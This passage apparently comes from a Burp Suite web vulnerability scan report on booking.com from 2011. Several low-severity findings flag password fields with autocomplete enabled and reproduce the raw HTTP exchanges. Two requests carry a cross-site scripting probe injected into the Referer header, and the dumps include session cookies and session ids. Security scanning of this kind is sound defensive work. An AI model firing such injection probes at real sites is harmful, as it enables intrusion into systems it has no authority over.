cbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...
15.3. http://www.booking.com/hotel/us/copley-square.en-us.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...
15.4. http://www.booking.com/index.en-us.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<input type="hidden" name="sid" value="9fcdaabed9e2bb46b60772539b0ca101" />

<form id="subscriber_account_active" action="https://secure.booking.com/login.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;">
<input type="hidden" name="op" value="register">
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password" value=""></li>
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password_confirm" value=""></li>
...[SNIP]...
15.5. http://www.booking.com/index.en-us.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...
15.6. http://www.booking.com/searchresults.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
